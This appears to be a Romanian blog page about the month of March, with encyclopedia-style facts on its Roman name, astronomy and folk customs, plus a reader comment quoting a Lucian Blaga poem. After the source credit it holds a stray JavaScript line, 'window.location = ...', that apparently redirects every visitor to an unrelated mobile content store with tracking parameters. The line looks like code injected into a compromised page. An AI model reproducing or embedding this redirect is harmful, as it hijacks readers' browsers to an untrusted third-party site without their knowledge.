Martie

Martie este a treia lună a anului în calendarul Gregorian și una dintre cele șapte luni gregoriene cu o durată de 31 de zile.

Din punct de vedere astronomic, luna martie începe cu soarele în constelația Vărsătorului și se sfârșește cu soarele în constelația Peștilor. In astronomia veche, martie începea cu soarele în semnul Peștilor și sfârșea în semnul Berbecului.

Numele lunii martie (latină: Martius) vine de la zeul Marte, zeul războiului din mitologia romană și era considerată o lună favorabilă începerii războiului. Sub împăratul Romulus al Romei, anul începea cu această lună, abia în anul 45 î.Hr., Iuliu Cezar a introdus Calendarul iulian iar anul începea la 1 ianuarie.

Grecii numeau luna martie Elaphebolion. În România, luna martie, popular, se numește Mărțișor. În luna martie începe aratul și semănatul, se curăța livezile și grădinile, se scot stupii de la iernat și se “reteaza” fagurii de miere utilizați ca leac în medicina populară etc.

Martie începe cu aceeași zi a săptămânii ca și Februarie cu excepția anilor bisecți și ca Noiembrie în fiecare an. Echinocțiul de primăvară in emisfera nordica, respectiv echinocțiul de tomnă in emisfera sudică, (data când ziua este egală cu noaptea), este o data care variaza de la 19 martie la 21 martie.

Martie – Les Très Riches Heures du duc de Berry

sursa: http://ro.wikipedia.org/

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

1 comment

 1. Mariana Stratulat

  Martie
  de Lucian Blaga

  Din caier încălcit de nouri
  toarce vântul
  fire lungi de ploaie.
  Flusturatici fulgi de nea
  s-ar aşeza-n noroi,
  dar cum li-e silă –
  se ridică iar
  şi zboară sa-şi găsească
  cuib de ramuri.
  Vânt şi-i frig –
  iar mugurii
  prea lacomi de lumină
  işi zgulesc acum
  urechile în guler.

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *